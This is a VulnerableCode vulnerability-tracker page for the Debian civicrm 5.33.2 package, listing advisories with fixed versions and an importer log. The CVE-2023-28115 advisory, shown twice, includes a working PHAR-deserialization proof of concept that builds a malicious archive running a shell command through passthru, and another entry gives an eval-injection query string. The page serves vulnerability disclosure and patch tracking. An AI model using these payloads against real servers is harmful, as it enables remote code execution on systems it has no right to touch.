VulnerableCode Package Details - pkg:deb/debian/civicrm@5.33.2%2Bdfsg1-1

Search for packages

Vulnerability	Summary	Fixed by
VCID-1wkj-35wu-73gj Aliases: CVE-2021-21252 GHSA-jxwx-85vp-gvwm	Regular Expression Denial of Service in jquery-validation The GitHub Security Lab team has identified potential security vulnerabilities in jquery.validation. The project contains one or more regular expressions that are vulnerable to ReDoS (Regular Expression Denial of Service) This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).	5.68.1+dfsg1-1 Affected by 0 other vulnerabilities.
VCID-r9m5-vhxg-e7ew Aliases: CVE-2023-28115 GHSA-gq6w-q6wh-jggc	PHAR deserialization allowing remote code execution ## Description snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. ## Proof of Concept Install Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code. ```php <?php // index.php // include autoloader require __DIR__ . '/vendor/autoload.php'; // reference the snappy namespace use Knp\Snappy\Pdf; // vulnerable object class VulnerableClass { public $fileName; public $callback; function __destruct() { call_user_func($this->callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php <?php // generate_phar.php class VulnerableClass { } // Create a new instance of the Dummy class and modify its property $dummy = new VulnerableClass(); $dummy->callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); // Add a new file in the archive with "text" as its content $poc["file"] = "text"; // Add the dummy object to the metadata. This will be serialized $poc->setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?> ``` Then run these command to generate the file ```php php --define phar.readonly=0 generate_phar.php ``` Then execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick. ## Impact This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. ## Occurences <https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670> ## References - <https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/>	5.68.1+dfsg1-1 Affected by 0 other vulnerabilities.
VCID-sjfv-8z43-97fn Aliases: CVE-2023-25440	Stored Cross Site Scripting (XSS) vulnerability in the add contact function CiviCRM 5.59.alpha1, allows attackers to execute arbitrary code in first/second name field.	5.68.1+dfsg1-1 Affected by 0 other vulnerabilities.

Vulnerability

Summary

Fixed by

VCID-1wkj-35wu-73gj
Aliases:
CVE-2021-21252
GHSA-jxwx-85vp-gvwm

Regular Expression Denial of Service in jquery-validation The GitHub Security Lab team has identified potential security vulnerabilities in jquery.validation. The project contains one or more regular expressions that are vulnerable to ReDoS (Regular Expression Denial of Service) This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).

5.68.1+dfsg1-1
Affected by 0 other vulnerabilities.

VCID-r9m5-vhxg-e7ew
Aliases:
CVE-2023-28115
GHSA-gq6w-q6wh-jggc

PHAR deserialization allowing remote code execution ## Description snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. ## Proof of Concept Install Snappy via composer require `knplabs/knp-snappy`. After that, under snappy directory, create an `index.php` file with this vulnerable code. ```php <?php // index.php // include autoloader require __DIR__ . '/vendor/autoload.php'; // reference the snappy namespace use Knp\Snappy\Pdf; // vulnerable object class VulnerableClass { public $fileName; public $callback; function __destruct() { call_user_func($this->callback, $this->fileName); } } $snappy = new Pdf('/usr/local/bin/wkhtmltopdf'); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar'); ``` As an attacker, we going to generate the malicious phar using this script. ```php <?php // generate_phar.php class VulnerableClass { } // Create a new instance of the Dummy class and modify its property $dummy = new VulnerableClass(); $dummy->callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload // Delete any existing PHAR archive with that name @unlink("poc.phar"); // Create a new archive $poc = new Phar("poc.phar"); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();"); // Add a new file in the archive with "text" as its content $poc["file"] = "text"; // Add the dummy object to the metadata. This will be serialized $poc->setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?> ``` Then run these command to generate the file ```php php --define phar.readonly=0 generate_phar.php ``` Then execute index.php with `php index.php`. You will see a file named `pwned` will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick. ## Impact This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. ## Occurences <https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670> ## References - <https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/>

5.68.1+dfsg1-1
Affected by 0 other vulnerabilities.

VCID-sjfv-8z43-97fn
Aliases:
CVE-2023-25440

Stored Cross Site Scripting (XSS) vulnerability in the add contact function CiviCRM 5.59.alpha1, allows attackers to execute arbitrary code in first/second name field.

5.68.1+dfsg1-1
Affected by 0 other vulnerabilities.

Vulnerability	Summary	Aliases
VCID-a2dz-vvxf-9ue8	PEAR HTML_QuickForm version 3.2.14 contains an eval injection (CWE-95) vulnerability in HTML_QuickForm's getSubmitValue method, HTML_QuickForm's validate method, HTML_QuickForm_hierselect's _setOptions method, HTML_QuickForm_element's _findValue method, HTML_QuickForm_element's _prepareValue method. that can result in Possible information disclosure, possible impact on data integrity and execution of arbitrary code. This attack appear to be exploitable via A specially crafted query string could be utilised, e.g. http://www.example.com/admin/add_practice_type_id[1]=fubar%27])%20OR%20die(%27OOK!%27);%20//&mode=live. This vulnerability appears to have been fixed in 3.2.15.	CVE-2018-1999022
VCID-c4xs-9e81-uuaf	In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF.	CVE-2020-36389
VCID-h8py-d9w1-cubx	In CiviCRM before 5.21.3 and 5.22.x through 5.24.x before 5.24.3, users may be able to upload and execute a crafted PHAR archive.	CVE-2020-36388

Vulnerability

Summary

Aliases

VCID-a2dz-vvxf-9ue8

PEAR HTML_QuickForm version 3.2.14 contains an eval injection (CWE-95) vulnerability in HTML_QuickForm's getSubmitValue method, HTML_QuickForm's validate method, HTML_QuickForm_hierselect's _setOptions method, HTML_QuickForm_element's _findValue method, HTML_QuickForm_element's _prepareValue method. that can result in Possible information disclosure, possible impact on data integrity and execution of arbitrary code. This attack appear to be exploitable via A specially crafted query string could be utilised, e.g. http://www.example.com/admin/add_practice_type_id[1]=fubar%27])%20OR%20die(%27OOK!%27);%20//&mode=live. This vulnerability appears to have been fixed in 3.2.15.

CVE-2018-1999022

VCID-c4xs-9e81-uuaf

In CiviCRM before 5.28.1 and CiviCRM ESR before 5.27.5 ESR, the CKEditor configuration form allows CSRF.

CVE-2020-36389

VCID-h8py-d9w1-cubx

In CiviCRM before 5.21.3 and 5.22.x through 5.24.x before 5.24.3, users may be able to upload and execute a crafted PHAR archive.

CVE-2020-36388

Date	Actor	Action	Vulnerability	Source	VulnerableCode Version
2025-08-01T19:48:50.360350+00:00	Debian Oval Importer	Fixing	VCID-h8py-d9w1-cubx	https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2	37.0.0
2025-08-01T17:13:52.414131+00:00	Debian Oval Importer	Fixing	VCID-a2dz-vvxf-9ue8	https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2	37.0.0
2025-08-01T13:31:19.002234+00:00	Debian Oval Importer	Fixing	VCID-c4xs-9e81-uuaf	https://www.debian.org/security/oval/oval-definitions-bullseye.xml.bz2	37.0.0
2025-08-01T13:21:28.127665+00:00	Debian Importer	Affected by	VCID-r9m5-vhxg-e7ew	https://security-tracker.debian.org/tracker/data/json	37.0.0
2025-08-01T13:21:10.319214+00:00	Debian Importer	Affected by	VCID-1wkj-35wu-73gj	https://security-tracker.debian.org/tracker/data/json	37.0.0
2025-08-01T13:18:15.884870+00:00	Debian Importer	Affected by	VCID-sjfv-8z43-97fn	https://security-tracker.debian.org/tracker/data/json	37.0.0